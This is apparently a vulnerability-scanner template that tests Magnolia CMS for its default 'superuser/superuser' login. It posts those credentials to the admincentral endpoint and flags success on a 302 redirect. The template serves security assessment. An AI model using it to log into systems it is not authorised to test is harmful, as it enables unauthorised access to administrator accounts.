id: magnolia-default-cred
info:
  name: Magnolia Default credential
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/magnoliaPublic/.magnolia/admincentral
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
      - Referer: '{{.root}}/magnoliaPublic/.magnolia/admincentral'
    body: |
      mgnlUserId=superuser&mgnlUserPSWD=superuser&csrf=
    detections:
      - >-
        StatusCode() == 302 && StringSearch("resHeaders", ".magnolia/admincentral") && ContentLength('body') == 0 && StringSearch("resHeaders", "Path=/magnoliaPublic")
